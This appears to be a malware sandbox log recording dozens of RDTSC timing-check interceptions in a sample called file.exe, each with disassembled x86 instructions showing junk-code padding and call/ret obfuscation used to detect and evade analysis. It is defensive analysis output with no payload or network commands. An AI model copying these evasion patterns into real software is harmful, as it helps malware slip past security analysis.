Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 845BC4 second address: 845BC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 83CC16 second address: 83CC27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop ecx 0x00000007 push esi 0x00000008 pushad 0x00000009 popad 0x0000000a pop esi 0x0000000b popad 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 83CC27 second address: 83CC2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 846495 second address: 84649B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 819E95 second address: 819EC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F8A2CE89C96h 0x0000000a popad 0x0000000b jmp 00007F8A2CE89C9Bh 0x00000010 pop edi 0x00000011 pushad 0x00000012 jno 00007F8A2CE89C9Ah 0x00000018 push eax 0x00000019 pushad 0x0000001a popad 0x0000001b pushad 0x0000001c popad 0x0000001d pop eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 84C92F second address: 84C935 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 84B125 second address: 84B12B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 84B12B second address: 84B152 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F8A2D3CFED6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push esi 0x0000000f jmp 00007F8A2D3CFEE4h 0x00000014 pop esi 0x00000015 push esi 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8167AE second address: 8167C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8A2CE89CA6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8532CC second address: 8532D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 85355D second address: 853563 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 853563 second address: 853597 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F8A2D3CFED6h 0x0000000a popad 0x0000000b push ebx 0x0000000c jmp 00007F8A2D3CFEE5h 0x00000011 pop ebx 0x00000012 jnl 00007F8A2D3CFEDEh 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 853597 second address: 85359B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 85359B second address: 8535A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8535A1 second address: 8535B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F8A2CE89C9Ah 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 853C54 second address: 853C61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b pop eax 0x0000000c pop edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 853C61 second address: 853C7B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jo 00007F8A2CE89C96h 0x00000009 js 00007F8A2CE89C96h 0x0000000f pop esi 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push edi 0x00000017 pop edi 0x00000018 push edi 0x00000019 pop edi 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 853C7B second address: 853CA5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2D3CFEE8h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jc 00007F8A2D3CFEDCh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 853CA5 second address: 853CB0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007F8A2CE89C96h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 855D2F second address: 855D39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F8A2D3CFED6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 855D39 second address: 855D3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 855DE6 second address: 855DF0 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F8A2D3CFED6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 855DF0 second address: 855E38 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 ja 00007F8A2CE89C96h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xor dword ptr [esp], 7F073F76h 0x00000015 push 00000000h 0x00000017 push ecx 0x00000018 call 00007F8A2CE89C98h 0x0000001d pop ecx 0x0000001e mov dword ptr [esp+04h], ecx 0x00000022 add dword ptr [esp+04h], 00000017h 0x0000002a inc ecx 0x0000002b push ecx 0x0000002c ret 0x0000002d pop ecx 0x0000002e ret 0x0000002f xor dword ptr [ebp+122DB51Ch], edi 0x00000035 push CBBA38B5h 0x0000003a push ecx 0x0000003b push eax 0x0000003c push edx 0x0000003d js 00007F8A2CE89C96h 0x00000043 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 85633D second address: 856343 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 856DAB second address: 856DB5 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F8A2CE89C96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 856F18 second address: 856F22 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F8A2D3CFED6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8573FE second address: 857403 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 857403 second address: 857409 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 857409 second address: 857482 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ecx 0x0000000d call 00007F8A2CE89C98h 0x00000012 pop ecx 0x00000013 mov dword ptr [esp+04h], ecx 0x00000017 add dword ptr [esp+04h], 00000014h 0x0000001f inc ecx 0x00000020 push ecx 0x00000021 ret 0x00000022 pop ecx 0x00000023 ret 0x00000024 pushad 0x00000025 call 00007F8A2CE89CA6h 0x0000002a add ax, 31B5h 0x0000002f pop edx 0x00000030 jmp 00007F8A2CE89CA1h 0x00000035 popad 0x00000036 mov edi, dword ptr [ebp+122D3AC3h] 0x0000003c push 00000000h 0x0000003e or si, 7F31h 0x00000043 push 00000000h 0x00000045 mov edi, dword ptr [ebp+122D3AABh] 0x0000004b push eax 0x0000004c push eax 0x0000004d push edx 0x0000004e jl 00007F8A2CE89C9Ch 0x00000054 js 00007F8A2CE89C96h 0x0000005a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 857E17 second address: 857E1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 85992F second address: 859935 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 859935 second address: 85993A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 85993A second address: 8599C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2CE89CA0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push edi 0x0000000f call 00007F8A2CE89C98h 0x00000014 pop edi 0x00000015 mov dword ptr [esp+04h], edi 0x00000019 add dword ptr [esp+04h], 00000017h 0x00000021 inc edi 0x00000022 push edi 0x00000023 ret 0x00000024 pop edi 0x00000025 ret 0x00000026 push 00000000h 0x00000028 push 00000000h 0x0000002a push eax 0x0000002b call 00007F8A2CE89C98h 0x00000030 pop eax 0x00000031 mov dword ptr [esp+04h], eax 0x00000035 add dword ptr [esp+04h], 00000017h 0x0000003d inc eax 0x0000003e push eax 0x0000003f ret 0x00000040 pop eax 0x00000041 ret 0x00000042 jl 00007F8A2CE89C96h 0x00000048 push 00000000h 0x0000004a mov dword ptr [ebp+122D1F7Bh], edi 0x00000050 push eax 0x00000051 pushad 0x00000052 pushad 0x00000053 ja 00007F8A2CE89C96h 0x00000059 jmp 00007F8A2CE89CA5h 0x0000005e popad 0x0000005f push eax 0x00000060 push edx 0x00000061 push eax 0x00000062 push edx 0x00000063 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8599C2 second address: 8599C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8599C6 second address: 8599CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 85B4BC second address: 85B4C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 85B4C2 second address: 85B4C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 805E2B second address: 805E34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 805E34 second address: 805E3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 805E3C second address: 805E41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 805E41 second address: 805E4D instructions: 0x00000000 rdtsc 0x00000002 je 00007F8A2CE89C9Eh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 85BB25 second address: 85BB34 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2D3CFEDBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 85C5D7 second address: 85C638 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 jmp 00007F8A2CE89CA3h 0x0000000e nop 0x0000000f jmp 00007F8A2CE89C9Eh 0x00000014 push 00000000h 0x00000016 call 00007F8A2CE89C9Dh 0x0000001b jmp 00007F8A2CE89CA4h 0x00000020 pop edi 0x00000021 push 00000000h 0x00000023 mov esi, 423F1613h 0x00000028 push eax 0x00000029 push eax 0x0000002a push edx 0x0000002b jo 00007F8A2CE89C9Ch 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 85C638 second address: 85C63C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 85C63C second address: 85C64E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8A2CE89C9Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 85D07E second address: 85D0D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 mov dword ptr [esp], eax 0x00000008 call 00007F8A2D3CFEE3h 0x0000000d cld 0x0000000e pop edi 0x0000000f push 00000000h 0x00000011 mov edi, dword ptr [ebp+122D31BDh] 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push edx 0x0000001c call 00007F8A2D3CFED8h 0x00000021 pop edx 0x00000022 mov dword ptr [esp+04h], edx 0x00000026 add dword ptr [esp+04h], 00000017h 0x0000002e inc edx 0x0000002f push edx 0x00000030 ret 0x00000031 pop edx 0x00000032 ret 0x00000033 sub esi, dword ptr [ebp+122D394Bh] 0x00000039 push eax 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e je 00007F8A2D3CFED6h 0x00000044 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 85CE58 second address: 85CE5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 85D0D5 second address: 85D0DB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 85F0BA second address: 85F0C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F8A2CE89C96h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 860747 second address: 86074F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 86074F second address: 860765 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F8A2CE89C96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jc 00007F8A2CE89C98h 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 862862 second address: 862867 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 862867 second address: 86286C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 865866 second address: 865887 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8A2D3CFEE9h 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8679C2 second address: 867A4D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 jmp 00007F8A2CE89C9Dh 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push ecx 0x00000011 call 00007F8A2CE89C98h 0x00000016 pop ecx 0x00000017 mov dword ptr [esp+04h], ecx 0x0000001b add dword ptr [esp+04h], 00000019h 0x00000023 inc ecx 0x00000024 push ecx 0x00000025 ret 0x00000026 pop ecx 0x00000027 ret 0x00000028 push 00000000h 0x0000002a add edi, 38E88480h 0x00000030 call 00007F8A2CE89CA8h 0x00000035 mov dword ptr [ebp+122D17B9h], esi 0x0000003b pop edi 0x0000003c push 00000000h 0x0000003e push 00000000h 0x00000040 push ecx 0x00000041 call 00007F8A2CE89C98h 0x00000046 pop ecx 0x00000047 mov dword ptr [esp+04h], ecx 0x0000004b add dword ptr [esp+04h], 00000017h 0x00000053 inc ecx 0x00000054 push ecx 0x00000055 ret 0x00000056 pop ecx 0x00000057 ret 0x00000058 mov edi, dword ptr [ebp+122D382Fh] 0x0000005e push eax 0x0000005f push eax 0x00000060 push edx 0x00000061 pushad 0x00000062 push eax 0x00000063 push edx 0x00000064 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 867A4D second address: 867A53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 867A53 second address: 867A58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8619BD second address: 8619D3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2D3CFEDEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c pop eax 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 863A5C second address: 863A61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 86B2A7 second address: 86B320 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push edi 0x0000000c call 00007F8A2D3CFED8h 0x00000011 pop edi 0x00000012 mov dword ptr [esp+04h], edi 0x00000016 add dword ptr [esp+04h], 00000017h 0x0000001e inc edi 0x0000001f push edi 0x00000020 ret 0x00000021 pop edi 0x00000022 ret 0x00000023 pushad 0x00000024 pushad 0x00000025 jng 00007F8A2D3CFED6h 0x0000002b call 00007F8A2D3CFEE4h 0x00000030 pop ebx 0x00000031 popad 0x00000032 mov dl, 38h 0x00000034 popad 0x00000035 push 00000000h 0x00000037 and ebx, dword ptr [ebp+12455732h] 0x0000003d push 00000000h 0x0000003f je 00007F8A2D3CFED9h 0x00000045 or bl, FFFFFFA0h 0x00000048 xchg eax, esi 0x00000049 pushad 0x0000004a push eax 0x0000004b push edx 0x0000004c jmp 00007F8A2D3CFEE9h 0x00000051 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 86F521 second address: 86F531 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F8A2CE89C96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 86F5FF second address: 86F603 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 86F603 second address: 86F61D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2CE89CA6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 870688 second address: 87068D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 87068D second address: 870697 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F8A2CE89C96h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 86B548 second address: 86B54E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 86E6D6 second address: 86E6F3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2CE89CA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 86F7A4 second address: 86F83A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 mov dword ptr [esp], eax 0x00000008 jo 00007F8A2D3CFEE2h 0x0000000e jno 00007F8A2D3CFEDCh 0x00000014 push dword ptr fs:[00000000h] 0x0000001b push 00000000h 0x0000001d push ebx 0x0000001e call 00007F8A2D3CFED8h 0x00000023 pop ebx 0x00000024 mov dword ptr [esp+04h], ebx 0x00000028 add dword ptr [esp+04h], 00000019h 0x00000030 inc ebx 0x00000031 push ebx 0x00000032 ret 0x00000033 pop ebx 0x00000034 ret 0x00000035 xor edi, dword ptr [ebp+122D379Bh] 0x0000003b mov dword ptr fs:[00000000h], esp 0x00000042 or edi, dword ptr [ebp+122D3AABh] 0x00000048 mov eax, dword ptr [ebp+122D170Dh] 0x0000004e movzx ebx, ax 0x00000051 jl 00007F8A2D3CFED8h 0x00000057 mov edi, edx 0x00000059 push FFFFFFFFh 0x0000005b push 00000000h 0x0000005d push esi 0x0000005e call 00007F8A2D3CFED8h 0x00000063 pop esi 0x00000064 mov dword ptr [esp+04h], esi 0x00000068 add dword ptr [esp+04h], 0000001Ch 0x00000070 inc esi 0x00000071 push esi 0x00000072 ret 0x00000073 pop esi 0x00000074 ret 0x00000075 movsx ebx, ax 0x00000078 nop 0x00000079 push eax 0x0000007a push edx 0x0000007b push eax 0x0000007c push edx 0x0000007d push eax 0x0000007e push edx 0x0000007f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 86F83A second address: 86F83E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 86F83E second address: 86F844 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 870807 second address: 87080B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 879336 second address: 87934D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8A2D3CFEE1h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 87934D second address: 879380 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8A2CE89CA7h 0x00000009 popad 0x0000000a push edx 0x0000000b jmp 00007F8A2CE89CA3h 0x00000010 push edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8794CB second address: 8794E5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jnp 00007F8A2D3CFED6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jns 00007F8A2D3CFEDAh 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8794E5 second address: 8794EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8794EB second address: 8794EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 87960F second address: 87961A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 87961A second address: 879620 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 879620 second address: 879628 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 87E939 second address: 87E947 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F8A2D3CFED6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 87E947 second address: 87E94B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 87E94B second address: 87E94F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 87E94F second address: 87E991 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push esi 0x00000009 pushad 0x0000000a jmp 00007F8A2CE89CA4h 0x0000000f jmp 00007F8A2CE89CA9h 0x00000014 popad 0x00000015 pop esi 0x00000016 mov eax, dword ptr [esp+04h] 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 87E991 second address: 87E995 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
